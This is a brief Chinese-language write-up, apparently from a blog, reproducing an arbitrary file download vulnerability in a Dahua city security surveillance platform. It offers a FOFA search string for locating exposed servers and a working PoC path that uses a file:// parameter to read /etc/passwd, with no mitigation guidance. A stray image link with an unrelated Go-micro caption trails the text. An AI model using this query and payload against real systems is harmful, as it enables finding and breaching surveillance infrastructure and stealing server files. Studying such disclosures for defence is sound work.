大华城市安防监控系统平台管理存在任意文件下载漏洞
- 1.大华城市安防监控系统平台管理存在任意文件下载漏洞
- 1.1.漏洞描述
- 1.2.漏洞影响
- 1.3.FOFA
- 2.漏洞复现
- 2.1.登录页面
- 2.2.抓包
1.大华城市安防监控系统平台管理存在任意文件下载漏洞
1.1.漏洞描述
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。
1.2.漏洞影响
大华城市安防监控系统平台管理
1.3.FOFA
“attachment_downloadByUrlAtt.action”
2.漏洞复现
2.1.登录页面
2.2.抓包
刷新登录页面进行抓包,然后在数据包中添加POC。
POC:/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
![Go-micro[windows]安装以及踩坑](https://img-blog.csdnimg.cn/img_convert/3ab251e0b88786c97975c5274a1dd67e.png)
